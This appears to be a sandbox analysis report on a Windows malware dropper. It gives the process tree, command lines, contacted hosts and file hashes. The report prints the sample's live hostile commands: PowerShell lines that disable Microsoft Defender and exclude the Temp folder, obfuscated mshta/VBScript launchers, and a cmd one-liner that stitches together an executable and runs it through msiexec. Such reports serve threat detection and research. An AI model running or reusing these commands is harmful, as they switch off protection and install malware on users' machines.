PID 4124 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe
PID 4124 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe
PID 1948 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 3852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 3852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 804 wrote to memory of 852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 804 wrote to memory of 852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 804 wrote to memory of 852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1948 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4436 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe
PID 4436 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe
PID 4436 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe
PID 3520 wrote to memory of 4152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe
PID 3520 wrote to memory of 4152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe
PID 3520 wrote to memory of 4152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe
PID 3968 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0944361c3621a67a6.exe
PID 3968 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0944361c3621a67a6.exe
PID 3272 wrote to memory of 5084 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe
PID 3272 wrote to memory of 5084 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe
PID 3272 wrote to memory of 5084 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe
PID 4376 wrote to memory of 1776 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe
PID 4376 wrote to memory of 1776 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe

Processes

C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe

"C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09ed6b36e57df5f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0944361c3621a67a6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0900caa0501dc98f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed090db89ca4c58.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09c4c0c3d01.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0983917533e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09d761ab4704dd931.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0968d19e5ec37794.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09f69eef9c0d5b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09fbe3bf81.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09755e77ed017e8af.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed091bab77a3bb62d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe

Wed09ed6b36e57df5f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe

Wed0900caa0501dc98f.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1948 -ip 1948

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0944361c3621a67a6.exe

Wed0944361c3621a67a6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe

Wed090db89ca4c58.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe

Wed09755e77ed017e8af.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe

Wed0983917533e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe

Wed09d761ab4704dd931.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe

Wed09c4c0c3d01.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe

Wed09fbe3bf81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe

Wed091bab77a3bb62d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe

Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe

Wed09f69eef9c0d5b.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2232 -ip 2232

C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$602B8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 356

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$90058,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA

C:\Windows\SysWOW64\taskkill.exe

taskkill /f -IM "Wed090db89ca4c58.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct ( "wSCRIPT.SHEll" ). RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W " , 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81 &CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eChO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"

C:\Windows\SysWOW64\msiexec.exe

msiexec /y ..\_enU.W

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 wensela.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 ip-api.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 8.8.8.8:53 propanla.com udp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
N/A 127.0.0.1:61238 tcp
N/A 127.0.0.1:61240 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FI 135.181.129.119:4805 tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 104.20.4.235:443 pastebin.com tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 98.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
US 72.84.118.132:8080 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 www.qxsgxd.com udp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe

MD5 b742c566607929a9735af5c299846051
SHA1 09be99b3b9d2d7c834f1018fa431be9a40f30c87
SHA256 cdea7bfa75a3bc43c888e945754e11ff3d9db4ad5348898a751e5bc274f4cde7
SHA512 33aa9956aec500a3c398bcea53624754bd8d5db4b0ed5e8552269c8f2f37a379041eeda0d7155124ac780dd46944e0bc968db875d1fac6d32544b781b07d7188

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/1948-65-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1948-66-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1948-62-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/852-67-0x000000007364E000-0x000000007364F000-memory.dmp

memory/1948-64-0x0000000064940000-0x0000000064959000-memory.dmp

memory/852-69-0x0000000000B10000-0x0000000000B46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/852-82-0x0000000073640000-0x0000000073DF0000-memory.dmp

memory/852-84-0x0000000004EB0000-0x00000000054D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
